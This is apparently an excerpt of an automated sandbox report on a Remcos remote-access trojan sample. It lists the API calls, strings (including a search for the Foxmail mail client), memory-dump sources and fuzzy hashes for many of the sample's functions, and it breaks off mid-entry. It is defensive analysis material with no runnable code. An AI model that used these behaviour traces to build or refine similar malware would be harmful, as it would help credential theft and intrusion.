                                                                                                                                                                                    control_flow_graph 11265 3347966-33479a5 call 3336650 call 3336658 NtAllocateVirtualMemory
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0334799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 0334796B
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03347970
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                    • API String ID: 2167126740-2206134580
                                                                                                                                                                                    • Opcode ID: 3cb22abd151663f7fcb56690a6c86d5161e28fc0ae305248cedc9a8ef0837d97
                                                                                                                                                                                    • Instruction ID: 56403a89d2695cdc494c09b3f5980aea56866e19c7e5a13205c16283f7ac3ea9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cb22abd151663f7fcb56690a6c86d5161e28fc0ae305248cedc9a8ef0837d97
                                                                                                                                                                                    • Instruction Fuzzy Hash: B3E075B664030CBFDB01EFA8D8C6EDB77ECAB09650F008412BA28D7101D771E9508BA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11271 3347968-33479a5 call 3336650 call 3336658 NtAllocateVirtualMemory
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0334799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 0334796B
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03347970
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                    • API String ID: 2167126740-2206134580
                                                                                                                                                                                    • Opcode ID: 30005567caee2353f9be58cd7dbf8cab68ce57f781d05471e361151de9e9cbe0
                                                                                                                                                                                    • Instruction ID: 34e4930ccd69337bc1bc55db17add78a17d52505486bb49959c7c8b1de88877d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30005567caee2353f9be58cd7dbf8cab68ce57f781d05471e361151de9e9cbe0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76E075B654030CBFDB01EFA8D8C6EDB77ACAB09650F008412BA28D7101D771E5508BA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 2DE91434
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 2DE91137
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrcatW.KERNEL32(?,?), ref: 2DE91151
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9115C
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9116D
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9117C
                                                                                                                                                                                      • Part of subcall function 2DE910F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 2DE91193
                                                                                                                                                                                      • Part of subcall function 2DE910F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 2DE911D0
                                                                                                                                                                                      • Part of subcall function 2DE910F1: FindClose.KERNEL32(00000000), ref: 2DE911DB
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 2DE914C5
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 2DE914E0
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 2DE9150F
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 2DE91521
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 2DE91547
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 2DE91553
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 2DE91579
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 2DE91585
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 2DE915AB
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 2DE915B7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                    • API String ID: 672098462-2938083778
                                                                                                                                                                                    • Opcode ID: b8dbfafd89e04f66c995155b33d4724e4e9911d4d5f2b899c16d21786f0654c9
                                                                                                                                                                                    • Instruction ID: 2de0026cfc59bc5de0dae15c2a36b396c8a4e2b6595285caf43092e57c493bc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: b8dbfafd89e04f66c995155b33d4724e4e9911d4d5f2b899c16d21786f0654c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1681A171A41358A9DB20DBA0DC85FEF7379EF84710F00059AF609FB291EE715A84CB95
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,2DE96FFD,00000000,?,?,?,2DE98A72,?,?,00000100), ref: 2DE9887B
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,2DE98A72,?,?,00000100,5EFC4D8B,?,?), ref: 2DE98901
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 2DE989FB
                                                                                                                                                                                    • __freea.LIBCMT ref: 2DE98A08
                                                                                                                                                                                      • Part of subcall function 2DE956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 2DE95702
                                                                                                                                                                                    • __freea.LIBCMT ref: 2DE98A11
                                                                                                                                                                                    • __freea.LIBCMT ref: 2DE98A36
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                    • Opcode ID: 02636d80c7520d4f89223ef4ac2273380b03db81c3226823d9907812d9fe4d30
                                                                                                                                                                                    • Instruction ID: 898e55964adbb238bdac242c3da2e0d09b10b0972d251ea2cb68b7a51d667d78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02636d80c7520d4f89223ef4ac2273380b03db81c3226823d9907812d9fe4d30
                                                                                                                                                                                    • Instruction Fuzzy Hash: 365104B2612616ABDB258E60CCC0EFF77A9EB41654F114629FE28F6160EF74DC50C6A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(2DE9C7DD), ref: 2DE9C7E6
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,2DE9C7DD), ref: 2DE9C838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2DE9C860
                                                                                                                                                                                      • Part of subcall function 2DE9C803: GetProcAddress.KERNEL32(00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C804
                                                                                                                                                                                      • Part of subcall function 2DE9C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C816
                                                                                                                                                                                      • Part of subcall function 2DE9C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C82A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction ID: 5de2c0485e8a68a7f611e134c04ba91f22cbc81ac9fa7e4aa1379d77671d42d8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: D101D24194B251F8EA3176740C05EFA5FD8DB276A4F111B96E240B6193DDA0A506C3E6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,2DE9C7DD), ref: 2DE9C838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2DE9C860
                                                                                                                                                                                      • Part of subcall function 2DE9C7E6: GetModuleHandleA.KERNEL32(2DE9C7DD), ref: 2DE9C7E6
                                                                                                                                                                                      • Part of subcall function 2DE9C7E6: GetProcAddress.KERNEL32(00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C804
                                                                                                                                                                                      • Part of subcall function 2DE9C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C816
                                                                                                                                                                                      • Part of subcall function 2DE9C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C82A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction ID: ae9c072a641592b6f0fcab14533232dcc5e5e0d0c93ea353c9c0ed995a723023
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction Fuzzy Hash: C721276140B281EFE732AB744C04AF66FD8DB132A4F194696D140FB143DDA8A546C3A2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C804
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C816
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C82A
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,2DE9C7DD), ref: 2DE9C838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2DE9C860
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 333e37af44ec904547d2fc780e718c71edc2626903c89398e9ecd58cc38bda3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AF0F64154B340FCFA3275B41C45EFA5FCC8B276A4B101A56E200F7183DC95A50683F6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,2DE91D66,00000000,00000000,?,2DE95C88,2DE91D66,00000000,00000000,00000000,?,2DE95E85,00000006,FlsSetValue), ref: 2DE95D13
                                                                                                                                                                                    • GetLastError.KERNEL32(?,2DE95C88,2DE91D66,00000000,00000000,00000000,?,2DE95E85,00000006,FlsSetValue,2DE9E190,FlsSetValue,00000000,00000364,?,2DE95BC8), ref: 2DE95D1F
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,2DE95C88,2DE91D66,00000000,00000000,00000000,?,2DE95E85,00000006,FlsSetValue,2DE9E190,FlsSetValue,00000000), ref: 2DE95D2D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                    • Opcode ID: 8e4c7dadeb15aac58f66b029110ac4593da629e68dd60111ced2f852a847e24c
                                                                                                                                                                                    • Instruction ID: 1077e89f282a1b84e2dbabb0f88c3e4c0d16becb55d122eca0d1341c6c7ffaca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e4c7dadeb15aac58f66b029110ac4593da629e68dd60111ced2f852a847e24c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 720188376172726BC7124A689C4DFDB77A9AF05BA57104621F90AF7280DB34D901C6D4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,03347BA5,?,?,00000000,00000000), ref: 03347B81
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID: irtualProtect$kernel32
                                                                                                                                                                                    • API String ID: 544645111-2063912171
                                                                                                                                                                                    • Opcode ID: b7e4909df8ae733c5cf26478a1101a9f614afe80b149f49437704822300a6dd3
                                                                                                                                                                                    • Instruction ID: f2ac7d0b1bd4820900623e66035fd189590df11e353663d696b2304639b5a5b8
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7e4909df8ae733c5cf26478a1101a9f614afe80b149f49437704822300a6dd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A012C79A04348BFD701EFA4DCD1E5EB7ECEB4A610F508465F924E7640D770AA418A24
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                    • Opcode ID: 59200efd0ea4c459d3184a57f5d45ea5adfd882c309ecb97db535bd7a438a5c1
                                                                                                                                                                                    • Instruction ID: eceef4cc2a9db1d6e6772495c5e25210440f2b2224b33bf7ca86fa50b599bcff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 59200efd0ea4c459d3184a57f5d45ea5adfd882c309ecb97db535bd7a438a5c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C21C47660E3866FEB15CF749C40FF97BA8DF4226CF25419DEA44BB245EE328A018354
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 2DE96AF0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                                                                                    • Opcode ID: 5e60f3b80a84c0bb9f6ae5d4d83607246eff51ff303be95c2b88c5781c15458c
                                                                                                                                                                                    • Instruction ID: 18075017bf297c210a39675d26cb7995f5c191e56b2504c1c3045937bc54c5f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e60f3b80a84c0bb9f6ae5d4d83607246eff51ff303be95c2b88c5781c15458c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C3414CF15063DC9ADB228F248C80FE6BBF9EB15308F1444EEE589A6142F6359946CF60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 2DE95F8A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                                                                    • Opcode ID: 8c8ec908d09b5e3b31966042d56516501cb02d0f881dcb3d5ca2e99e6e2151da
                                                                                                                                                                                    • Instruction ID: 2d7f67421301bbd75b6b2dceada9e9a0684decd835eafa8f500ba96fa9b18559
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c8ec908d09b5e3b31966042d56516501cb02d0f881dcb3d5ca2e99e6e2151da
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69011332506119BBCF029F91CD01EEE3FB6EF08760F014018FA0936220CB369931AB85
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Alloc
                                                                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                                                                                    • Opcode ID: fccace9c0fea79330210c9cda898c20af66c0ca4bbc2d8140d180e5460fae9c0
                                                                                                                                                                                    • Instruction ID: 4260fe08ac4a7da48b191e99e946d9a04f7854545dffb7f0ebc9e1d6bebe276d
                                                                                                                                                                                    • Opcode Fuzzy Hash: fccace9c0fea79330210c9cda898c20af66c0ca4bbc2d8140d180e5460fae9c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21E0E532607228B7D7116B618D14FFF7BA5DB14E10F014059FB0676312CE25691185D9
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • try_get_function.LIBVCRUNTIME ref: 2DE93B06
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: try_get_function
                                                                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                                                                    • API String ID: 2742660187-671089009
                                                                                                                                                                                    • Opcode ID: 098187e7c4ac8805c938ce04bbe7f5c09ff22b48d35e9b1cc6df4b3f0c6c8ab3
                                                                                                                                                                                    • Instruction ID: e94c8468833a5d3413e754ee9d9f1475ab28be8131b23dd68b4c8a2f4b772205
                                                                                                                                                                                    • Opcode Fuzzy Hash: 098187e7c4ac8805c938ce04bbe7f5c09ff22b48d35e9b1cc6df4b3f0c6c8ab3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FD05B3364B938A3C61025A55D04BFD7B95D7009B6F400062FB4DB7619DD95797046CD
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE969F3: GetOEMCP.KERNEL32(00000000,?,?,2DE96C7C,?), ref: 2DE96A1E
                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,2DE96CC1,?,00000000), ref: 2DE96E94
                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,2DE96CC1,?,?,?,2DE96CC1,?,00000000), ref: 2DE96EA7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                                                    • Opcode ID: a2474eeb8af0eede0b6cc6289ec61ec0eb976f3399813fac817fa88bad34c7d8
                                                                                                                                                                                    • Instruction ID: 093ebfe5b8efdc855742b13a587f75a4a1dff10e2c4e3e70612751ba78f202c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2474eeb8af0eede0b6cc6289ec61ec0eb976f3399813fac817fa88bad34c7d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7651DFB1A0A2D59EDB118F71C480AFABBE5EF41308F14806FD186BA252DB7596468B90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE95AF6: GetLastError.KERNEL32(?,?,2DE96C6C), ref: 2DE95AFA
                                                                                                                                                                                      • Part of subcall function 2DE95AF6: _free.LIBCMT ref: 2DE95B2D
                                                                                                                                                                                      • Part of subcall function 2DE95AF6: SetLastError.KERNEL32(00000000,?,?,2DE96C6C), ref: 2DE95B6E
